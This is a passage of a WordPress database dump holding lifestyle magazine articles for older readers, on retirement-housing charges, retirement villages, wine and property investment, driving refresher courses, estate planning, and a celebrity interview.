sun?','527','publish','open','open','','buying-a-home-in-the-spanish-sun','','','2018-04-02 20:08:09','2018-04-02 20:08:09','',0,'http://westonspirit.org.uk/buying-a-home-in-the-spanish-sun.asp',0,'post','',0),(115,1,'2017-10-13 19:18:52','2017-10-13 19:18:52','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 March 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> gnorwood\" title=\"Posts by Graham Norwood\" rel=\"author\"&gt;Graham Norwood</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Don’t forget the small print\" st_url=\"http://westonspirit.org.uk/2012/03/dont-forget-the-small-print/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Don’t forget the small print\" st_url=\"http://westonspirit.org.uk/2012/03/dont-forget-the-small-print/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Don’t forget the small print\" st_url=\"http://westonspirit.org.uk/2012/03/dont-forget-the-small-print/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Don’t forget the small print\" st_url=\"http://westonspirit.org.uk/2012/03/dont-forget-the-small-print/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Don’t forget the small print\" st_url=\"http://westonspirit.org.uk/2012/03/dont-forget-the-small-print/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Enjoy a trouble-free retirement by choosing a specialist property – but watch out for extra, unexpected charges</h4>&#13;\n<p>Buying a specialist retirement house or apartment can be a fantastic way of easing the burdens associated with traditional home ownership in later life. But anyone thinking of purchasing must remember there are often additional costs, even after you move in.</p>&#13;\n<p>The largest ongoing cost will be the service charge. When you owned your own home, you had to pay for repairs, building insurance, gardening and keeping everything neat and tidy.</p>&#13;\n<p></p><div id=\"attachment_1674\" class=\"wp-caption alignright\" style=\"width: 440px\"><img class=\" wp-image-1674  \" title=\"Take a close look at the contract you sign\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/200368390-001.jpg\" alt=\"\" width=\"430\" height=\"287\" /><p class=\"wp-caption-text\">Take a close look at the contract you sign</p></div>&#13;\n<p>Likewise in a retirement development, these same activities and services are funded through a service charge on all individual owners. The charge is set out in a lease or transfer contract, so ensure you check before buying. The cost varies depending on the development’s facilities and the size of your home.</p>&#13;\n<p>There can also be other costs – sometimes levied on a daily basis – if a resident requires additional cleaning, supervision or medical care above the basic service provided.</p>&#13;\n<p>Third, if an owner wants to sub-let the apartment it is vital to check the contract. Some development managers forbid any sub-letting, while others charge a fee varying from a small annual charge to a big percentage of the property value.</p>&#13;\n<p>A fourth cost may be an exit fee which you or your family pay when a retirement property is sold. The fee varies per development and could be as low as 1 per cent of the sale price, but could be as much as 25 per cent.</p>&#13;\n<p>Development managers say these one-off payments are used to help fund facilities, but many families fail to budget for them.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em>More help is available from the Association of Retirement Housing Managers at www.arhm.org and Housing Care at <strong><a title=\"www.housingcare.org\" href=\"http://www.housingcare.org/\" target=\"_blank\">www.housingcare.org</a></strong></em></p>&#13;\n									</div>','Don’t forget the small print','306','publish','open','open','','dont-forget-the-small-print','','','2018-04-02 20:08:07','2018-04-02 20:08:07','',0,'http://westonspirit.org.uk/dont-forget-the-small-print.asp',0,'post','',0),(117,1,'2015-03-09 21:11:20','2015-03-09 21:11:20','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 March 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Downsize a home, upgrade a lifestyle\" st_url=\"http://westonspirit.org.uk/2012/03/downsize-a-home-upgrade-a-lifestyle/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Downsize a home, upgrade a lifestyle\" st_url=\"http://westonspirit.org.uk/2012/03/downsize-a-home-upgrade-a-lifestyle/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Downsize a home, upgrade a lifestyle\" st_url=\"http://westonspirit.org.uk/2012/03/downsize-a-home-upgrade-a-lifestyle/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Downsize a home, upgrade a lifestyle\" st_url=\"http://westonspirit.org.uk/2012/03/downsize-a-home-upgrade-a-lifestyle/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Downsize a home, upgrade a lifestyle\" st_url=\"http://westonspirit.org.uk/2012/03/downsize-a-home-upgrade-a-lifestyle/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Residents of one retirement village get much more than the great restaurants and sport facilities on offer – friendship, security and independence</h4>&#13;\n<p>If you are planning to move during retirement and are looking at the options available, this is an excellent time to secure the home and lifestyle that suits you in one of the purpose-built retirement villages which have become such a popular option for those entering the third chapter in their lives.</p>&#13;\n<p>The team at Urban Renaissance Villages has been creating these villages for more than 30 years and offers a choice, depending on when you want to move. If you want to move in right away, Bramshott Place Village, Liphook, is ideal. At Durrants Village, near Horsham, construction is imminent in a scheme comprising two bedroom apartments and two/three bedroom cottages, giving you the opportunity and time to choose your plot and style of home for a move in the spring of next year.</p>&#13;\n<p>The distinctive lifestyle offered by these specially designed villages for people over 55, particularly the security and friendship elements, has proved very popular.</p>&#13;\n<p></p><div id=\"attachment_1695\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-1695\" title=\"Residents enjoy a drink in the clubhouse bar at Bramshott Place Village\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/BramshottPic2.jpg\" alt=\"\" width=\"596\" height=\"397\" /><p class=\"wp-caption-text\">Residents enjoy a drink in the clubhouse bar at Bramshott Place Village</p></div>&#13;\n<p>“We are fast running out of property choices at Bramshott Place Village,” says Bill Gair, chief executive of Urban Renaissance Villages. “If anyone is considering downsizing from their family home to an energy efficient, secure, traditional and easily maintained home in one of our villages now, or further down the line, I would advise them to reserve the plot of their choice before there is no choice available!</p>&#13;\n<p>“Bramshott Place Village is home to a range of people, single and married couples, from all walks of life and professions, but with one thing in common,” he says. “They all want to remain independent as they enter the third stage of their lives, but be surrounded by like-minded people. Some still go out to work. Many do voluntary work and raise a lot of money for charity. But they all want to lead an active and fulfilling life.”</p>&#13;\n<p>The need to downsize is one of the main reasons why people move to retirement villages, and in the case of Margaret Knight and her husband Quintin, it was the realisation that they possessed no fewer than 70 teacups that persuaded them it was time to move to smaller premises.</p>&#13;\n<p>“We had far too many belongings,” says Margaret. “We thought, ‘we must downsize’. We spotted Bramshott Place Village on the internet and decided to take a look. We met a lot of people who were also looking, as well as people already living here, and everyone seemed pleasant and enjoying themselves. So we decided to join them.”</p>&#13;\n<p>“The general strategy of the place is excellent,” says Quintin. “There’s a nurse on duty for prescriptions and flu jabs, a restaurant, and the other excellent facilities of the clubhouse.”</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em>For further information, call us or visit our websites.</em></p>&#13;\n<p><em>Selling agent, Roger N Coupe: <strong>01483 268555</strong></em></p>&#13;\n<p><em>Bramshott Place Village: <strong>01428 722800</strong></em></p>&#13;\n<p><strong><em><a title=\"www.bramshottplace.co.uk\" href=\"http://www.bramshottplace.co.uk/\" target=\"_blank\">www.bramshottplace.co.uk</a></em></strong></p>&#13;\n<p><em>Durrants Village: <strong>01293 851935</strong></em></p>&#13;\n<p><strong><em><a title=\"www.durrantsvillage.co.uk\" href=\"http://www.durrantsvillage.co.uk/\" target=\"_blank\">www.durrantsvillage.co.uk</a></em></strong></p>&#13;\n									</div>','Downsize a home, upgrade a lifestyle','499','publish','open','open','','downsize-a-home-upgrade-a-lifestyle','','','2018-04-02 20:08:06','2018-04-02 20:08:06','',0,'http://westonspirit.org.uk/downsize-a-home-upgrade-a-lifestyle.asp',0,'post','',0),(118,1,'2017-11-06 05:21:53','2017-11-06 05:21:53','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 March 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Get a taste of fine investment\" st_url=\"http://westonspirit.org.uk/2012/03/get-a-taste-of-fine-investment/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Get a taste of fine investment\" st_url=\"http://westonspirit.org.uk/2012/03/get-a-taste-of-fine-investment/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Get a taste of fine investment\" st_url=\"http://westonspirit.org.uk/2012/03/get-a-taste-of-fine-investment/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Get a taste of fine investment\" st_url=\"http://westonspirit.org.uk/2012/03/get-a-taste-of-fine-investment/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Get a taste of fine investment\" st_url=\"http://westonspirit.org.uk/2012/03/get-a-taste-of-fine-investment/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Money doesn’t grow on trees – it grows on a vine. And with the value of fine wines maturing rapidly, now could be the perfect time to invest in a case of the good stuff</h4>&#13;\n<p>You don’t have to be a wine buff to appreciate the value of investing in wine.</p>&#13;\n<p>Fine wine values have been surging. Château Lafite Rothschild 2008 increased from £1,605 a case in 2008 to more than £15,000 in 2010, while Mouton Rothschild rose over 400 per cent in the same period. Much of the rise is driven by the newfound passion for Bordeaux among the wealthy in China, but fundamentals such as limited production help.</p>&#13;\n<p>However, wine is not guaranteed to appreciate, so it pays to research the market. “We pride ourselves on offering realistic returns so we only recommend investment in the blue chips of the wine world,” says Kyle McLeod of wine brokerage Worldwide Wine Investments.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1603\" title=\"old bottles in wine cellar\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/iStock_000010640361XSmall.jpg\" alt=\"\" width=\"596\" height=\"395\" />The company concentrates on the ‘top eight’. These are first growth Bordeaux comprising Château Margaux, Château Latour, Château Lafite Rothschild, Château Haut-Brion and Château Mouton-Rothschild, plus Châteaux Petrus, Ausone and Cheval Blanc. These wines have historically shown the best investment performance, according to Worldwide Wine Investment.</p>&#13;\n<p>The recommendations that Worldwide Wine Investment give are also influenced by Robert Parker Junior, the most influential name in international wine investment, who grades wines out of 100.</p>&#13;\n<p>“We only recommend first growths scoring between 95 and 100,” says McLeod. Case prices include ten years’ storage in government-bonded warehouses, ensuring that it is VAT and duty-free. It attracts no capital gains tax if held for less than 50 years, making wine a tax-free asset. Insurance and administration charges are also included.</p>&#13;\n<p>Investors can buy wines en primeur, that is, before bottling, tending to be less expensive, giving the possibility of greater gains later. McLeod says: “Fine wine is best seen as a medium-term investment for at least three to five years.”</p>&#13;\n<p>When you want to sell, the brokerage can arrange it for you.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em><strong>01908 540664</strong></em></p>&#13;\n<p><em><strong><a title=\"www.world-widewines.co.uk\" href=\"http://www.world-widewines.co.uk/\" target=\"_blank\">www.world-widewines.co.uk</a></strong></em></p>&#13;\n									</div>','Get a taste of fine investment','326','publish','open','open','','get-a-taste-of-fine-investment','','','2018-04-02 20:08:04','2018-04-02 20:08:04','',0,'http://westonspirit.org.uk/get-a-taste-of-fine-investment.asp',0,'post','',0),(119,1,'2015-11-23 01:01:48','2015-11-23 01:01:48','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 March 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_buttons\" st_title=\"Get Up and Go – March\" st_url=\"http://westonspirit.org.uk/2012/03/get-up-and-go-march/\" displaytext=\"share\"></span><span class=\"st_linkedin_buttons\" st_title=\"Get Up and Go – March\" st_url=\"http://westonspirit.org.uk/2012/03/get-up-and-go-march/\" displaytext=\"share\"></span><span class=\"st_twitter_buttons\" st_title=\"Get Up and Go – March\" st_url=\"http://westonspirit.org.uk/2012/03/get-up-and-go-march/\" displaytext=\"share\"></span><span class=\"st_facebook_buttons\" st_title=\"Get Up and Go – March\" st_url=\"http://westonspirit.org.uk/2012/03/get-up-and-go-march/\" displaytext=\"share\"></span><span class=\"st_plusone_buttons\" st_title=\"Get Up and Go – March\" st_url=\"http://westonspirit.org.uk/2012/03/get-up-and-go-march/\" displaytext=\"share\"></span>						</div>&#13;\n                	                	                	<p>Check out our great ideas for health, home and lifestyle. Read our interviews with stars of the stage and screen. See what our money writers have to say about the best ways to invest your hard-earned funds.</p>&#13;\n<p>Distributed with <em>The Sunday Telegraph</em></p>&#13;\n<p><object style=\"width:610px;height:400px\"><param name=\"movie\" value=\"http://static.issuu.com/webembed/viewers/style1/v1/IssuuViewer.swf?mode=embed&amp;documentId=120302112011-6690f19a29ce440b840b4d309c2d98c0&amp;docName=get-up-and-go-2&amp;username=Lyonsdown&amp;loadingInfoText=Get%20up%20and%20go%202&amp;backgroundColor=fff9b6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" /><param name=\"allowfullscreen\" value=\"true\" /><param name=\"menu\" value=\"false\" /><embed src=\"/webembed/viewers/style1/v1/IssuuViewer.swf\" type=\"application/x-shockwave-flash\" style=\"width:610px;height:400px\" flashvars=\"mode=embed&amp;documentId=120302112011-6690f19a29ce440b840b4d309c2d98c0&amp;docName=get-up-and-go-2&amp;username=Lyonsdown&amp;loadingInfoText=Get%20up%20and%20go%202&amp;backgroundColor=fff9b6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" allowfullscreen=\"true\" menu=\"false\"></embed></object></p>&#13;\n									</div>','Get Up and Go – March','10','publish','open','open','','get-up-and-go-march','','','2018-04-02 20:08:03','2018-04-02 20:08:03','',0,'http://westonspirit.org.uk/get-up-and-go-march.asp',0,'post','',0),(120,1,'2015-09-23 21:09:58','2015-09-23 21:09:58','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 March 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Getting a real deal\" st_url=\"http://westonspirit.org.uk/2012/03/getting-a-real-deal/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Getting a real deal\" st_url=\"http://westonspirit.org.uk/2012/03/getting-a-real-deal/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Getting a real deal\" st_url=\"http://westonspirit.org.uk/2012/03/getting-a-real-deal/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Getting a real deal\" st_url=\"http://westonspirit.org.uk/2012/03/getting-a-real-deal/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Getting a real deal\" st_url=\"http://westonspirit.org.uk/2012/03/getting-a-real-deal/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>‘‘Ninety per cent of all millionaires become so through owning real estate” – Andrew Carnegie, steel magnate and philanthropist and one of the richest men in history (1919).</h4>&#13;\n<p>Coming from a man who made Croesus look cheap, these words suggest that an investment in commercial property should be a key part of any portfolio. But since few of us can afford to snap up a skyscraper, factory or shopping mall, how should we tap into the market? Is now the time to do it?</p>&#13;\n<p>Currently, prime property investments yield around 5 per cent compared with the 2.9 per cent on UK government bonds. With a total return of 8.1 per cent in 2016, property also comfortably beat equities, where investors lost money over the year. All of which suggests that there is still value in the commercial property market.</p>&#13;\n<p>Ongoing economic uncertainty in the UK will inevitably affect the underlying demand for all types of property, unless you’re flogging a Kensington mansion to an oligarch.</p>&#13;\n<p><img class=\"alignright  wp-image-1656\" title=\"Green House\" src=\"/wp-content/uploads/2012/03/92202570Con-copy-e1330811801783.jpg\" alt=\"\" width=\"358\" height=\"577\" />But a significant amount of the return on commercial property investments comes from rental income – and as long as this stays fairly stable, the sector should continue to provide relatively attractive real returns until capital growth comes back.</p>&#13;\n<p>The main routes for private investors to access the commercial property market are through investment in funds, investment trusts or real estate investment trusts (REITs).</p>&#13;\n<p>Mutual funds can be bought and sold on a daily basis with moderate costs, and are offered by most large investment houses and insurance companies.</p>&#13;\n<p>Property investment trusts have shown better returns over the past three years. They have the extra plus point that they can borrow to take advantage of opportunities, can hold money in reserve to ensure continuity of dividends in poorer times and, as companies quoted on a stock exchange, can be quickly bought and sold.</p><div class=\"woo-sc-quote\"><p> Economic uncertainty in the UK will inevitably affect the demand for all types of property”</p></div>&#13;\n<p>REITs are publicly-listed companies which are not subject to corporation tax or capital gains tax on their qualifying activities – and as a condition of this tax status, 90 per cent of their income from these activities has to be distributed to shareholders as dividends.</p>&#13;\n<p>Most of the large quoted property companies in the UK, such as British Land and Segro, have converted to REIT status. These stocks are highly liquid and offer 4 per cent to 6 per cent yields, but do tend to move more in line with the stock market so give limited protection against ups and downs.</p>&#13;\n<p>Changes to the rules governing REITs set to be introduced under the Finance Bill 2017 should make it easier to establish them – making REITs more attractive to institutional investors such as pension funds and insurance companies. The changes will also extend their scope into other sectors such as residential.</p>&#13;\n<p>In the end, the bleak economic picture means we shouldn’t wholeheartedly concur with Carnegie. Instead, we may align ourselves more with Will Rogers, America’s cowboy philosopher, and his advice: “Don’t wait to buy real estate, buy real estate and wait.”</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em><strong>Tom McIntosh</strong> may have an interest in any investment topic he writes about</em></p>&#13;\n									</div>','Getting a real deal','518','publish','open','open','','getting-a-real-deal','','','2018-04-02 20:08:01','2018-04-02 20:08:01','',0,'http://westonspirit.org.uk/getting-a-real-deal.asp',0,'post','',0),(121,1,'2014-11-06 10:26:08','2014-11-06 10:26:08','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 March 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> croberts\" title=\"Posts by Steve Martin\" rel=\"author\"&gt;Steve Martin</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Glorious, stirring sight!\" st_url=\"http://westonspirit.org.uk/2012/03/glorious-stirring-sight/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Glorious, stirring sight!\" st_url=\"http://westonspirit.org.uk/2012/03/glorious-stirring-sight/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Glorious, stirring sight!\" st_url=\"http://westonspirit.org.uk/2012/03/glorious-stirring-sight/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Glorious, stirring sight!\" st_url=\"http://westonspirit.org.uk/2012/03/glorious-stirring-sight/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Glorious, stirring sight!\" st_url=\"http://westonspirit.org.uk/2012/03/glorious-stirring-sight/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Are you in danger of becoming a Toad on the road? Refresher driving courses may be just what you need, says Steve Martin</h4>&#13;\n<p>Toad of Toad Hall called it “poetry in motion! The real way to travel”. But Toad’s love for his motor was not matched by his skills behind the wheel. As we get older, and with decades of driving behind us, it’s easy for all of us to become complacent about our road habits.</p>&#13;\n<p>But, warns the Driving Standards Agency (DSA), it is important that all keep their knowledge and skills up to date. Sixty-eight-year-old Ros Anderson, a driver for 38 years, has learned the value of a refresher course the hard way. A moment’s inattention caused her to collide with another car while pulling out of a junction and, although no-one was hurt, both vehicles were written off.</p><div class=\"woo-sc-quote\"><p>While reflexes become slower and our ability to judge speed and distance declines with age, older drivers compensate by adapting their driving practices</p></div>&#13;\n<p>“It was a real wake-up call,” she says. “The girl in the other car was lovely about it. It would have been terrible if I’d hurt her.” After the accident, she was sent on Lincolnshire Road Safety Partnership’s one-day driver alertness course. The morning was spent in the classroom looking at common accident scenarios. In the afternoon, Anderson took to the road with a professional instructor.</p>&#13;\n<p></p><div id=\"attachment_1691\" class=\"wp-caption alignright\" style=\"width: 368px\"><img class=\" wp-image-1691 \" title=\"Poop poop! The thrill of the open road\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/73441689con.jpg\" alt=\"\" width=\"358\" height=\"458\" /><p class=\"wp-caption-text\">Poop poop! The thrill of the open road</p></div>&#13;\n<p>“I drove first and was really nervous but my instructor was relaxed and I began to enjoy the experience,” she says. “We learned to look well ahead for potential hazards and were encouraged to give a spoken commentary of what was happening all around us.”</p>&#13;\n<p>Completing the course successfully meant she avoided prosecution and did not get any points on her licence. The refresher has, she says, transformed her driving.</p>&#13;\n<p>“I’m far more careful and thoughtful about it and treat it as the big responsibility it is. I also feel more in control and I don’t let my attention wander.”</p>&#13;\n<p>Three in four men and one in three women over 70 hold a licence and, from time to time, concerns are raised about the safety of older drivers. However, the DSA says there is no evidence to suggest older drivers are more likely to cause a serious accident than those in other age groups.</p>&#13;\n<p>While it is true that reflexes become slower and our ability to judge speed and distance declines with age, research has found older drivers compensate by adapting their driving practices.</p>&#13;\n<p>Steve Barnes, 84, recently tried out the Institute of Advanced Motorists’ DriveCheck55, which involves a tailored one-hour session with an instructor.</p>&#13;\n<p>“I’ve been driving since 1945 and I consider myself a decent driver,” he says. “I’ve driven all over this country and Europe and never had an accident, but I was curious to know what a professional would think of my driving.”</p>&#13;\n<p>Barnes was happy with the outcome: “The instructor only found two faults: not slowing down early enough before a speed limit and using the brakes rather than gears when going downhill. Otherwise, he thought I was quite good.”</p>&#13;\n									</div>','Glorious, stirring sight!','500','publish','open','open','','glorious-stirring-sight','','','2018-04-02 20:08:00','2018-04-02 20:08:00','',0,'http://westonspirit.org.uk/glorious-stirring-sight.asp',0,'post','',0),(122,1,'2014-10-27 07:58:13','2014-10-27 07:58:13','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 March 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Growing old can seriously damage your wealth\" st_url=\"http://westonspirit.org.uk/2012/03/growing-old-can-seriously-damage-your-wealth/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Growing old can seriously damage your wealth\" st_url=\"http://westonspirit.org.uk/2012/03/growing-old-can-seriously-damage-your-wealth/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Growing old can seriously damage your wealth\" st_url=\"http://westonspirit.org.uk/2012/03/growing-old-can-seriously-damage-your-wealth/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Growing old can seriously damage your wealth\" st_url=\"http://westonspirit.org.uk/2012/03/growing-old-can-seriously-damage-your-wealth/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Growing old can seriously damage your wealth\" st_url=\"http://westonspirit.org.uk/2012/03/growing-old-can-seriously-damage-your-wealth/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Preparing for the future involves more than just writing a will. The right advice could help you protect what you’ve worked hard for, ensuring an inheritance for your loved ones</h4>&#13;\n<p>It’s a certainty that you won’t be around forever. You have probably made plans for your demise by writing a will – a sensible and responsible thing to do. But when the time comes and your estate passes to those you choose, what if there is nothing left?</p>&#13;\n<h3>Long-term care fees</h3>&#13;\n<p>According to the Dilnot Commission in 2010 more than 45,000 homes are sold each year to fund care, with one in 10 people (or one in five couples) shouldering care costs of at least £100,000. Your loved ones could be left with as little as £14,250 –full state funding begins when your estate is diminished to this level.</p>&#13;\n<h3><img class=\"alignright size-full wp-image-1671\" title=\"Collective Legal\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/CollectiveLegal6.jpg\" alt=\"\" width=\"596\" height=\"395\" />Mental incapacity</h3>&#13;\n<p>If I had a pound for every time I have heard: “I’ll make plans for this when I start feeling iffy”, I’d be writing this article from a beach in the Seychelles rather than an office in a city! Accident or illness can strike at any time and impairment of the mind shouldn’t just be associated with illnesses such as Alzheimer’s. A stroke, car accident or other unexpected event can leave any one of us unable to make decisions for ourselves.</p>&#13;\n<p>Without an enduring or lasting power of attorney in place, a long, complex, intrusive and expensive court process awaits your loved ones to gain control of your affairs. Planning for the future requires far more than just writing a will. If you fail to plan effectively, you could be left with little to leave.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em><strong>Alexander Crate</strong> is company director at <strong>Collective Legal Solutions</strong>.</em></p>&#13;\n<p><em>For a free information pack or to arrange a home consultation contact <strong>Collective Legal Solutions</strong>, quoting reference ST03 on all enquiries.</em></p>&#13;\n<p><strong><em>0800 110 5221</em></strong></p>&#13;\n<p><strong><em><a title=\"www.collectivelegalsolutions.co.uk\" href=\"http://www.collectivelegalsolutions.co.uk/\" target=\"_blank\">www.collectivelegalsolutions.co.uk</a></em></strong></p>&#13;\n									</div>','Growing old can seriously damage your wealth','304','publish','open','open','','growing-old-can-seriously-damage-your-wealth','','','2018-04-02 20:07:58','2018-04-02 20:07:58','',0,'http://westonspirit.org.uk/growing-old-can-seriously-damage-your-wealth.asp',0,'post','',0),(123,1,'2018-03-07 02:42:56','2018-03-07 02:42:56','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 March 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_buttons\" st_title=\"I couldn’t live without… a photo of my dad\" st_url=\"http://westonspirit.org.uk/2012/03/i-couldnt-live-without-a-photo-of-my-dad/\" displaytext=\"share\"></span><span class=\"st_linkedin_buttons\" st_title=\"I couldn’t live without… a photo of my dad\" st_url=\"http://westonspirit.org.uk/2012/03/i-couldnt-live-without-a-photo-of-my-dad/\" displaytext=\"share\"></span><span class=\"st_twitter_buttons\" st_title=\"I couldn’t live without… a photo of my dad\" st_url=\"http://westonspirit.org.uk/2012/03/i-couldnt-live-without-a-photo-of-my-dad/\" displaytext=\"share\"></span><span class=\"st_facebook_buttons\" st_title=\"I couldn’t live without… a photo of my dad\" st_url=\"http://westonspirit.org.uk/2012/03/i-couldnt-live-without-a-photo-of-my-dad/\" displaytext=\"share\"></span><span class=\"st_plusone_buttons\" st_title=\"I couldn’t live without… a photo of my dad\" st_url=\"http://westonspirit.org.uk/2012/03/i-couldnt-live-without-a-photo-of-my-dad/\" displaytext=\"share\"></span>						</div>&#13;\n                	                	                	<h4>Baroness Susan Greenfield, 61, is professor of pharmacology at Oxford University. A writer and broadcaster, she is appearing at the Bath Literary Festival on 6 March</h4>&#13;\n<h3>Who’s in the photo?</h3>&#13;\n<p><img class=\"alignright size-medium wp-image-1586\" title=\"My Dad , as I remember him \" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/Picture-1-300x309.jpg\" alt=\"\" width=\"300\" height=\"309\" />The smaller man in the photo is my father, Reg Greenfield, who died last year, and the larger chap is Michael Black, the sculptor who carved the new emperors’ heads on Oxford’s Sheldonian Theatre. I love the difference in their sizes in this picture, which captures my dad perfectly; he’s sharing a joke with a good friend and has a glass of wine in one hand and a sausage in the other. It looks as though he has everything he could possibly want.</p>&#13;\n<h3>Did you receive your first inklings of science from your dad, who was an electrician by trade?</h3>&#13;\n<p>Dad, who was born in 1915, left school for technical college at 14 but I think he was a natural scientist who loved finding out how things worked. When I was 15, I bought a rabbit from a butcher and tried to cut open its brain. I was fascinated by what I might find.</p>&#13;\n<h3><img class=\"alignleft  wp-image-1587\" title=\"Susan Greenfield \" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/Susan-Greenfield-cThe-Adelaide-Advertiser-300x356.jpg\" alt=\"\" width=\"210\" height=\"249\" />What else did he give you?</h3>&#13;\n<p>My parents were good at making sure I didn’t get, as the Australians say, “up myself”. No matter how many awards or positions you get, the most important thing is having a decent set of values and being consistent as a person. That still stands me in good stead. I once introduced Mum and Dad to a very rich, well-known member of the establishment and Dad whispered, “He’s a bit of a show-off, isn’t he?”</p>&#13;\n<h3>What was your childhood ambition?</h3>&#13;\n<p>To run a riding school. I loved ponies; I remember reading things like Pony Jobs for Jill and Jill’s Gymkhana. Jill was everything I wanted to be in terms of pony ownership.</p>&#13;\n<h3>What are you working on at the moment?</h3>&#13;\n<p>Two books – one is a novel set in the future dystopia. The other one is about cyber culture and the impact of technologies on how young people think and feel.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em>Interview by John Holt</em></p>&#13;\n									</div>','I couldn’t live without… a photo of my dad','340','publish','open','open','','i-couldnt-live-without-a-photo-of-my-dad','','','2018-04-02 20:07:57','2018-04-02 20:07:57','',0,'http://westonspirit.org.uk/i-couldnt-live-without-a-photo-of-my-dad.asp',0,'post','',0),(124,1,'2014-06-26 23:36:58','2014-06-26 23:36:58','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 March 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                		